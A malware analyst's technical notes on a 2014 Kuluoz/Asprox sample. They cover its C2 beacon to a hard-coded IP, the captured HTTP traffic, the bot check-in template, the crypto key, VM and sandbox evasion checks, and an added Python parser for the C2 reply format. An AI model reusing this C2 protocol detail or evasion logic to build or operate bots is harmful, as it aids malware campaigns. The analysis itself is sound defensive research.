- -----------------------------------------------------------
- Sample : sample.exe
- MD5 : 0d173908dee410a2a42a983ff77a7264
- SHA256 : fef7a0185f3cc2467642f08156f6670ab8cd24b1201e864b878c905aee8514dc
- REF : https://www.virustotal.com/en/file/fef7a0185f3cc2467642f08156f6670ab8cd24b1201e864b878c905aee8514dc/analysis/
- http://www.threatexpert.com/report.aspx?md5=0d173908dee410a2a42a983ff77a7264
- Date: Tuesday January 14 2014 -- 20:25:28 +02:00
- -----------------------------------------------------------
- // Autostart:
- <8e0374 >>> Software\Microsoft\Windows\CurrentVersion\Run
- Injects files into Windows application Hide sources
- Source: C:\WINDOWS\system32\svchost.exe
- Injected file: C:\WINDOWS\system32\notepad.exe
- // Well-known string :-)
- 412155 >>> C KEY----- Unknown ERROR! Please wait and try again later.
- // PCAP in ASCII..
- // REQUEST:
- GET /DCC523DC84BAA5FDF7856F98F7905F8883B2C863C0 HTTP/1.1
- Accept: */*
- Content-Type: application/x-www-form-urlencoded
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
- Host: 66.255.131.164:8080
- Content-Length: 321
- Cache-Control: no-cache
- Data Raw: 80 00 00 00 47 9a 7e 56 f1 86 8f f4 50 f8 57 44 fb 2d 93 c8 5e 4d cb 56 5f 95 72 35 32 26 fa e3 49 92 0d 8d 5f 76 3c 7c d3 c0 71 ae 5a 91 c6 e1 67 6c 04 ac 58 63 fa 38 96 65 bd 8d 51 4a 88 65 aa 43 17 f1 d8 35 1d 36 6e e6 68 2a e3 46 1c c3 0b 25 fd f8 8e 1f cf af 2e 98 3d b2 c2 b0 fc c8 5d c3 73 b0 08 f1 5e 30 0a e1 67 75 7f 2e fc bf f7 a0 36 cc 5d a2 89 d4 79 be f0 e9 dc f4 f1 59 b5 81 6b 3f b9 00 00 00 61 a0 c5 c3 c1 03 58 e2 40 64 99 c2 37 e3 67 fe 1a 1a 03 e5 4d 46 81 6d 04 6f d0 37 ca 95 f5 18 f4 5a 1d 2e e1 b8 97 87 a8 e4 b4 21 77 a9 e4 cc b1 18 c6 e2 d2 d4 7f f7 80 e1 9b 7c c3 01 0e 71 3c 29 55 de 89 7a 1b 62 d4 d2 c7 30 b5 df ca ea be 96 8e 0e 40 84 13 b1 ab 77 67 0d 21 90 9e 2a f1 9c 12 23 f5 65 29 15 8e 51 48 97 19 ab 8d b1 2b 55 b3 34 63 6b 8e 73 19 5b 30 fe f4 a4 32 08 c9 ee c3 1b f1 2b de fd e4 44 29 94 fa 87 83 17 86 c7 e8 28 27 74 f5 b4 fa 9b b7 9b 70 1c ef b3 b1 bb 9c 8e 4d e8 14 7a d1 0f a6 f8 41 21 f1 ea e5 4b 99 96 65 b6 43 eb 76
- // RESPONSE
- HTTP/1.1 200 OK
- Server: nginx/1.2.6
- Date: Tue, 14 Jan 2014 10:51:23 GMT
- Content-Type: text/html; charset=utf-8
- Transfer-Encoding: chunked
- Connection: close
- f5
- Data Raw: 66 35 0d 0a 80 00 00 00 d0 4c 48 62 a3 0a da 83 e3 89 3a 58 74 21 52 46 89 ad 88 fd 7f d8 d3 84 26 29 92 de 77 91 99 dc 40 0c 74 73 94 6b 61 e4 9a 3a 5a 43 06 71 5c de 2c e9 86 ee 1b 47 51 bb 63 f9 c0 28 e5 41 5e c0 68 6b 9d 98 5f 79 c3 6f b5 20 f9 e1 92 e1 71 2c 53 89 bd 15 2a 92 2d d4 fa 87 b8 8f a0 e7 c5 cd 85 18 da 7c 94 95 61 a1 8b f0 c4 b3 ec 0f c4 35 87 fb 9d 7d c7 7b 43 02 00 e4 21 3d f0 85 50 80 6d 00 00 00 61 a0 c5 c3 c1 03 58 e2 40 64 d1 f3 2c 9a 67 fe 36 5a 03 b5 5d f9 25 ad e1 7e fd c5 41 6a b5 6c b0 f8 9e 91 bf fa e4 a3 0d ba 30 21 7b 68 2d 1f 42 18 c4 aa ab a9 96 13 d2 70 51 d3 4d 46 6b f9 45 52 8a 2b 2f bb f3 7a 14 76 d7 0f a5 e8 89 f3 2d ff ad 37 5c be 57 38 70 31 95 e5 bf d9 c0 2a b0 37 2a 3a 5f 95 68 01 fe bf db 7c ef 0d 0a 30 0d 0a 0d 0a
- // URL Decoded:
- POST /DCC523DC84BAA5FDF7856F98F7905F8883B2C863C0 HTTP/1.1
- 2f 69 6e 64 65 78 2e 70 68 /index.ph
- 70 3f 72 3d 67 61 74 65 p?r=gate
- PS: They decoded those in memory too, lame:
- 8e06b4 >>> /index.php?r=gate
- // Testing CNC..
- URL: h00p://66.255.131.164:8080/index.php?r=gate <=== Alive!!!!!!!!!!
- Tue Jan 14 20:05:53 JST 2014|66.255.131.164|uslec-66-255-131-164.cust.uslec.net.|1785 | 66.255.128.0/18 | AS-PAETEC-NET | US | USLEC.NET | TDARX INC
- (Hello USA..)
- $ ping 66.255.131.164
- PING 66.255.131.164 (66.255.131.164): 56 data bytes
- 64 bytes from 66.255.131.164: icmp_seq=0 ttl=44 time=305.283 ms
- 64 bytes from 66.255.131.164: icmp_seq=1 ttl=44 time=189.028 ms
- [...]
- $ NMAP BLAH..
- Nmap scan report for uslec-66-255-131-164.cust.uslec.net (66.255.131.164)
- Host is up (0.19s latency).
- Not shown: 996 closed ports
- PORT STATE SERVICE
- 22/tcp open ssh
- 53/tcp open domain
- 8080/tcp open http-proxy
- 9102/tcp open jetdirect
- // How SAMPLE is using encryption:
- // Source: C:\WINDOWS\system32\svchost.exe
- // Code function: 1_2_008D23D0 (Binary ADDRESS)
- CryptEncrypt,malloc,
- CryptEncrypt,CryptCreateHash,
- CryptHashData,
- CryptVerifySignatureA,malloc,free,
- CryptDestroyHash,
- // The trace of the public key dumped from memory:
- 8e3040 >>> -----BEGIN PUBLIC KEY-----
- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUAUdLJ1rmxx+bAndp+Cz6+5I
- Kmgap2hn2df/UiVglAvvg2US9qbk65ixqw3dGN/9O9B30q5RD+xtZ6gl4ChBquqw
- jwxzGTVqJeexn5RHjtFR9lmJMYIwzoc/kMG8e6C/GaS2FCgY8oBpcESVyT2woV7U
- 00SNFZ88nyVv33z9+wIDAQAB
- -----END PUBLIC KEY-----
- // Testing interesting strings decrypted in registry:
- 8e041c >>> For base!!!!!
- 8e1114 >>> You fag!!!!!
- ^^^ It looks like so many moronz like to use this "fag" word..
- decoding method works.
- // The template data sent to botnet:
- <knock><id>%s</id><group>%s</group><src>%d</src><transport>%d</transport><time>%d</time><version>%d</version><status>%d</status><debug>%s</debug></knock>
- // PS: I think I found the trace leading to the CODER of Kuluoz:
- C:\Users\DmitryHELL\Documents\SysIQUA\loader_1.4r\loader_v4\loader_v3\Release\
- <unixfreaxjp> ^^^^ See that "DmitryHELL" ?
- // notes:
- Herrcore decoded nicely: http://herrcore.blogspot.ca/2014/01/inside-new-asproxkuluoz-october-2013.html
- This sample has the same blocks, so they haven't upgraded it yet :-)
- Quoted "Examining the response we can see the first 4 bytes of the
- response body represent the length of the RSA signed hash of the data
- (little endian) 0x00000080. This is followed by the RSA signed hash. The
- RSA signed hash is followed by another 4 bytes that represent the length
- of the RC4 encrypted data 0x00000069. These 4 bytes are then followed by
- the RC4 encrypted data." <-- this should work.
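Parsing that framing (hex chunk size, 4-byte little-endian signature length, RSA-signed hash, 4-byte little-endian length, RC4 data) as an added Python example; this is not code from the original paste or from Herrcore's write-up, and the sample bytes are constructed, not the captured response. The 0x80 signature length matches the 1024-bit RSA key dumped above.

```python
import struct

def dechunk(raw: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: <hex size>CRLF<data>CRLF ... 0CRLFCRLF."""
    out = bytearray()
    pos = 0
    while True:
        end = raw.index(b"\r\n", pos)
        size = int(raw[pos:end].split(b";")[0], 16)  # drop any chunk extension
        if size == 0:
            return bytes(out)
        pos = end + 2
        out += raw[pos:pos + size]
        pos += size + 2  # skip the CRLF that closes the chunk

def parse_knock_response(body: bytes) -> dict:
    """Split a dechunked Kuluoz C2 reply into its two length-prefixed fields."""
    if len(body) < 4:
        raise ValueError("body too short for the signature length field")
    sig_len = struct.unpack_from("<I", body, 0)[0]          # 0x00000080 for a 1024-bit key
    off = 4 + sig_len
    if len(body) < off + 4:
        raise ValueError("truncated RSA signed hash")
    signature = body[4:off]
    data_len = struct.unpack_from("<I", body, off)[0]       # e.g. 0x00000069 in Herrcore's sample
    rc4_data = body[off + 4:off + 4 + data_len]
    if len(rc4_data) != data_len:
        raise ValueError("truncated RC4 payload")
    return {"sig_len": sig_len, "signature": signature,
            "data_len": data_len, "rc4_data": rc4_data}

# Constructed stand-in for the wire data: 128 dummy signature bytes, 0x69 dummy cipher bytes.
SAMPLE_BODY = struct.pack("<I", 0x80) + bytes(range(128)) + struct.pack("<I", 0x69) + bytes(0x69)
SAMPLE_CHUNKED = b"%x\r\n" % len(SAMPLE_BODY) + SAMPLE_BODY + b"\r\n0\r\n\r\n"

if __name__ == "__main__":
    fields = parse_knock_response(dechunk(SAMPLE_CHUNKED))
    print(hex(fields["sig_len"]), hex(fields["data_len"]))
```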
- // PCAP download:
- <unixfreaxjp> here's the PCAP: https://www.mediafire.com/?f0qsp4exa1azfgf
- // Kernel debugger checks:
- C:\WINDOWS\system32\svchost.exe System information
- queried: KernelDebuggerInformation
- // Vbox checks:
- svchost.exe : VBoxTray.exe
- svchost.exe : HARDWARE\ACPI\DSDT\VBOX__
- svchost.exe : vmusrvc.exe
- svchost.exe : VMwareDragDetWndClass
- svchost.exe : VBoxService.exe
- VM detection calls:
- 916): 8e0aa8 >>> vmtoolsd.exe
- 957): 8e0b4c >>> VMware
- 962): 8e0b94 >>> VMware
- 1093): 8e0b14 >>> vmsrvc.exe
- 1171): 8e0bcc >>> VMware
- 1208): 8e0b08 >>> vmusrvc.exe
- 1262): 8e0a70 >>> VMwareDragDetWndClass
- 1314): 8e0a88 >>> VMwareSwitchUserControlClass
- // Sandbox evasion, long sleeps:
- Source: C:\WINDOWS\system32\svchost.exe
- Thread delayed: delay time: -600
- // Detect wireshark:
- (1351): 8e0908 >>> wireshark.exe
- // etc evasion:
- 8e08a4 >>> SELECT * FROM FirewallProduct
- 8e07e0 >>> SELECT * FROM AntiVirusProduct
- // DLL loaded:
- // Known....
- (3): WINSPOOL.DRV
- (4): ShimEng.dll
- (5): WINMM.dll
- (6): MSACM32.dll
- (7): UxTheme.dll
- (8): kernel32.dll
- (13): comdlg32.dll
- (14): ADVAPI32.dll
- (15): RPCRT4.dll
- (16): Secur32.dll
- (18): msvcrt.dll
- (19): GDI32.dll
- (20): USER32.dll
- (21): SHLWAPI.dll
- (22): SHELL32.dll
- (30): ole32.dll
- (31): OLEAUT32.dll
- (33): VERSION.dll
- (34): USERENV.dll
- // etc DLL...dunno these..
- (17): C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll 773A0000 1060864
- (24): C:\WINDOWS\system32\shimeng.dll 5CF00000 155648
- (26): C:\WINDOWS\AppPatch\AcGenral.dll 3D0000 1855488
- (27): C:\WINDOWS\AppPatch\AcGenral.dll 3D0000 1855488
- (28): C:\WINDOWS\AppPatch\AcGenral.dll 6FD90000 1875968
- (29): C:\WINDOWS\system32\winmm.dll 76AF0000 188416
- (32): C:\WINDOWS\system32\msacm32.dll 77BB0000 86016
- (35): C:\WINDOWS\system32\uxtheme.dll 5B0F0000 229376
- (37): C:\WINDOWS\system32\imm32.dll 360000 110592
- (38): C:\WINDOWS\system32\imm32.dll 360000 110592
- (39): C:\WINDOWS\system32\imm32.dll 76330000 118784
- (43): C:\WINDOWS\system32\shell32.dll
- // Variable template list (forensics)
- (140): 41f215 >>> %Xe`
- (153): 41b7fa >>> %.ZM`
- (262): 41dd5d >>> r"%`
- (293): 422e2c >>> SymAgc Gain %f
- (577): 9f0a3 >>> ]=%1
- (664): 9f0e3 >>> ]=%1
- (698): 9f0a5 >>> %102
- (969): 8e0298 >>> http://%[^:]:%d/%s
- (1085): 8e0403 >>> ]=%1
- (1182): 8e0405 >>> %102
- (1193): 8e076c >>> %d.%d x%d
- (1258): 8e043c >>> %1024[^=]=%1024[^;]
- (1261): 8e0443 >>> ]=%1
- (1318): 8e06e8 >>> %[^:]:%d
- (1351): 8e03fc >>> %1024[^=]=%1024[^;]
- // Security breach attempts..
- (423): 100357e >>> SetSecurityDescriptorGroup
- (428): 100215c >>> CoInitializeSecurityParam
- (440): 100359c >>> SetSecurityDescriptorOwner
- (451): 10035ba >>> InitializeSecurityDescriptor
- (468): 100333e >>> CoInitializeSecurity
- (473): 100354e >>> SetSecurityDescriptorDacl
- (517): 1003942 >>> NtQuerySecurityObject
- (544): 1003a32 >>> RtlGetDaclSecurityDescriptor
- // RAM Forensics Registry calls:
- // Aggressives:
- 411b2c >>> RegDeleteValueA
- a09bc >>> RegDeleteValueA
- 8e1d1c >>> RegDeleteValueA
- 411a9e >>> RegCreateKeyA
- a092e >>> RegCreateKeyA
- 8e1c8e >>> RegCreateKeyA
- // Points:
- Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
- Software\Microsoft\Windows NT\CurrentVersion\Svchost
- Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
- Software\Microsoft\Windows\CurrentVersion\Run
- Software\Microsoft\Windows NT\CurrentVersion
- SYSTEM\CurrentControlSet\Services
- SYSTEM\CurrentControlSet\services\Disk\Enum
- SYSTEM\CurrentControlSet\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00
- SYSTEM\CurrentControlSet\Enum\PCI\VEN_15AD&DEV_0774&SUBSYS_074015AD&REV_00
- SYSTEM\CurrentControlSet\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00
- SYSTEM\CurrentControlSet\Enum\PCI\VEN_5333&DEV_8811&SUBSYS_00000000&REV_00
- HARDWARE\ACPI\DSDT\AMIBI
- HARDWARE\ACPI\DSDT\VBOX__
- HARDWARE\ACPI\DSDT\PTLTD__
- HARDWARE\DESCRIPTION\System\BIOS
- HARDWARE\DESCRIPTION\System\BIOS
- HARDWARE\DESCRIPTION\System\BIOS
- HARDWARE\DESCRIPTION\System\BIOS
- // RAM Forensics - System Information Grabs PoC
- // Info:
- 8e1300 >>> bb10bd00-c135-11e2-b7ac-005056c00008
- 8e0a24 >>> 99929D61-1338-48B1-9433-D42A1D94F0D2
- 8e09cc >>> 99929D61-1338-48B1-9433-D42A1D94F0D2-x64
- 8e09f8 >>> 99929D61-1338-48B1-9433-D42A1D94F0D2-x32
- 8e0a24 >>> 99929D61-1338-48B1-9433-D42A1D94F0D2
- 8e12d8 >>> c540500f-c135-11e2-b348-005056c00008
- // Calls:
- a06ea >>> GetVolumeInformationW
- 8e1d5a >>> LookupAccountNameA
- 8e1d70 >>> GetUserNameA
- 8e0bb8 >>> SystemProductName
- 8e08e0 >>> displayName
- 8e0dac >>> SystemManufacturer
- // Drops: (this is under check.. something looks to have gone wrong during the drop captures..)
- MD5: 7BF167A337B794CC26FF3C2DFFD68113
- SHA: 6077966E1FAA4F92E1137AB1F9177E72DDD4AA40
- ( still working on this.. not final.. may contain mistakes & inaccuracies)
- ----
- #MalwareMustDie
- @unixfreaxjp